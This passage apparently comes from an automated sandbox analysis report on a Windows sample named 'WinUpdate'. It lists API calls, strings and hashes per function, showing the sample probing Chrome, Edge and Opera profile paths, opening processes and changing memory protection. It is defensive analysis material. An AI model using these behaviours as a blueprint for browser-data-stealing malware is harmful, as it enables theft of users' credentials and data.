                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: (x86)$ProgramFiles$\Google\Chrome\Application\Chrome.exe
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-1866107781
                                                                                                                                                                                                                                                                                                • Opcode ID: d4c97370cde720a617b6f654919f9fd5f379b49c00f622e63597d2ecc3da5d5c
                                                                                                                                                                                                                                                                                                • Instruction ID: f5c5b1796602c674d072fdb72fdb3b9a68742e2cf3b4b57e043f71f885765a41
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4c97370cde720a617b6f654919f9fd5f379b49c00f622e63597d2ecc3da5d5c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B41DF74D10204EBEB00DFA8DC44BEEB7BAFF44784F60451DF406A7294DB38AA058BA0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,02E6C7DD), ref: 02E6C838
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 02E6C860
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6C7E6: GetModuleHandleA.KERNEL32(02E6C7DD), ref: 02E6C7E6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6C7E6: GetProcAddress.KERNEL32(00000000,02E6C7F4), ref: 02E6C804
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,02E6C7F4,02E6C7DD), ref: 02E6C816
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc$ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2080333215-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                                                                                • Instruction ID: fab4662abffbdffe947610af323574aad2e382a45e0ab30f2405b2e2de728a5d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8621D6614C82816EEB3146785C0C7B56FD99B173E8B39B697D0C0CB143D678A445C3E6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,02E6C7F4), ref: 02E6C804
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,02E6C7F4,02E6C7DD), ref: 02E6C816
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,02E6C7DD), ref: 02E6C838
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 02E6C860
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$HandleModuleProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2492872976-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                                                                                • Instruction ID: 72abb8e6492a45fc4b53584cb4813b99e0d02015a59151adee115e86840ca0f0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFF0AF415C52403CFA3155B81C4DABA5F8C8A276E8B34BA57A1D4C7183DAB9A50683F6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Microsoft\Edge\,0000001E,00000000,-00000002,00000000), ref: 100060BB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-2800177040
                                                                                                                                                                                                                                                                                                • Opcode ID: dbbbc3d76f2423d9031401f89fe6b4dc2b02bfb56d3d2dbe79114fe0f00f05a4
                                                                                                                                                                                                                                                                                                • Instruction ID: 85e45c25142740e28fbd5dc53a9d8ff5dbe67a4fa6c3c3076d736dc2108dc272
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbbbc3d76f2423d9031401f89fe6b4dc2b02bfb56d3d2dbe79114fe0f00f05a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4721B575D04204DBDB14DFA8DC05BEFB7F9FF08740F208519E916A3245DB74A6058BA0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(-00000002,\Opera Software\Opera Stable,0000001C,00000000,-00000002,00000000), ref: 100061BB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: AppData$\Opera Software\Opera Stable
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-1162561444
                                                                                                                                                                                                                                                                                                • Opcode ID: 40f7c0777fb176b05e5bcc9634ede44232967ad3891fa828f3d9934c04a6ccd9
                                                                                                                                                                                                                                                                                                • Instruction ID: f00d60261ac90b406eef5ab85d6db63d97fc6f89dbef8a3991c81c82add024b3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40f7c0777fb176b05e5bcc9634ede44232967ad3891fa828f3d9934c04a6ccd9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C221D675D04204EBEB14DFA8CC05BEFB7F9FF08780F608519E815A3285DB74A6058BA0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(-00000002,\Microsoft\Edge\Application\msedge.exe,00000026,00000000,-00000002), ref: 1000644B
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ProgramFiles, xrefs: 100063D6
                                                                                                                                                                                                                                                                                                • \Microsoft\Edge\Application\msedge.exe, xrefs: 1000642B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: ProgramFiles$\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-1265440269
                                                                                                                                                                                                                                                                                                • Opcode ID: dd8792878481810074d46a35867620a115f6c64e450a2a84bec02fab85e4a583
                                                                                                                                                                                                                                                                                                • Instruction ID: b3486840681a8c9b7979fbf1c3b21a1cb547e06702c49159833d47058733cd9d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd8792878481810074d46a35867620a115f6c64e450a2a84bec02fab85e4a583
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F821D675D00204DBEB14DFA8CC05BEFB7F9FF08784F608519E916A3284DB74A9058BA0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Google\Chrome\,0000001D,00000000,-00000002), ref: 10005FBB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-4188645398
                                                                                                                                                                                                                                                                                                • Opcode ID: ef18bef4f912b1344f1dae269e817b18603800f9f05bc9141c2f07b6daeea7c6
                                                                                                                                                                                                                                                                                                • Instruction ID: 77d355c08a898f8e50a63f28947c03bc0e31e75e4281b3d97ed022a44253448f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef18bef4f912b1344f1dae269e817b18603800f9f05bc9141c2f07b6daeea7c6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E21A175D04205DAEB14DFA8CC05BEFB7F8EF08741F508529E816A3284DB74A5058BA0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 100044DE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                • new.LIBCMT ref: 100044E4
                                                                                                                                                                                                                                                                                                • new.LIBCMT ref: 100044F8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Concurrency::cancel_current_taskException@8Throw
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3598223435-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a64682e58749376715ff285614fed1e7cc0981f6ee9bc294163a27801b01aede
                                                                                                                                                                                                                                                                                                • Instruction ID: 4acf8bbac3f2c21882ea0e06343d40b90099298c012174ff2abe7d7d1e891cfc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a64682e58749376715ff285614fed1e7cc0981f6ee9bc294163a27801b01aede
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 504104F1A00A018BF724DF68D880719B7E5EB452D1F120B2DE8538B68ADF70E944C7A6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10005126
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                • Opcode ID: eaa0f217be8f3647f415baa461963154c0a712c6ea737dd33bf379e98b84d204
                                                                                                                                                                                                                                                                                                • Instruction ID: 95843a031e05dac2a709eefcd5697d94da0e28df2c028df6d7444b4865a14f8d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaa0f217be8f3647f415baa461963154c0a712c6ea737dd33bf379e98b84d204
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B101B9322007445AF731CD4C988165FF3E9EBD12F5B760E1FE69197545D7736C4082A5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f87b84874486757e2c47ac47ea9f60d9c82a37147b210451a2933aa9f661e901
                                                                                                                                                                                                                                                                                                • Instruction ID: def42a02582f0e9aca0d42380fcba57ce1fa30504e24a63dc847fc71142e9800
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f87b84874486757e2c47ac47ea9f60d9c82a37147b210451a2933aa9f661e901
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBE06535281221E6E721F6A69D85B4B3698DF416F2F6B0220ED149E490DB73DC8182E2
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E659EA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E659F6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E65A01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E65A0C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E65A17
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E65A22
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E65A2D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E65A38
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E65A43
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E659D6: _free.LIBCMT ref: 02E65A51
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E659CB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: RtlFreeHeap.NTDLL(00000000,00000000,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?), ref: 02E65734
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: GetLastError.KERNEL32(?,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?,?), ref: 02E65746
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a10c4fce587a2011ee79e41ef0986008735e113b389719567842526d62b07321
                                                                                                                                                                                                                                                                                                • Instruction ID: bcbbda74ec929d98151306fa69cbc0d820db89ca394a93ad4fdf9abe83c79e85
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a10c4fce587a2011ee79e41ef0986008735e113b389719567842526d62b07321
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60C012321C860CAADB262E00D80DB693F969B403E4FA4D026B91805860DB32A9A1DAC8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007E20: FindFirstFileW.KERNEL32(?,?,?,00000000,76230F00), ref: 10007ED1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10007E20: FindNextFileW.KERNELBASE(00000000,?,?,00000000,76230F00), ref: 10007F0A
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 10007E03
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileFind$FirstNextSleep
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2635277345-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                                                                                • Instruction ID: ba8769b27b28ad511b2499f2b98cea4f31d6ecccccff2d72c20009a19a29048a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AE08636F0125467A601D6AEDC8195BF3EDEB891A0B1100B6E90DD3301E871DD0142E1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000440,00000000,00000000), ref: 10007054
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: OpenProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3743895883-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                                                                                • Instruction ID: 3fc6cb16c2acb38648db70abfd8e28bf1beac7dae34e75593325fef57f3a6704
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3717FB1E00219BBFB10DBA4DC85FEE77B8EF04794F1041A5FA08E6195E7759A01CBA1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 1000744D
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(000000FF,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100075C9
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1000765E
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 10007665
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
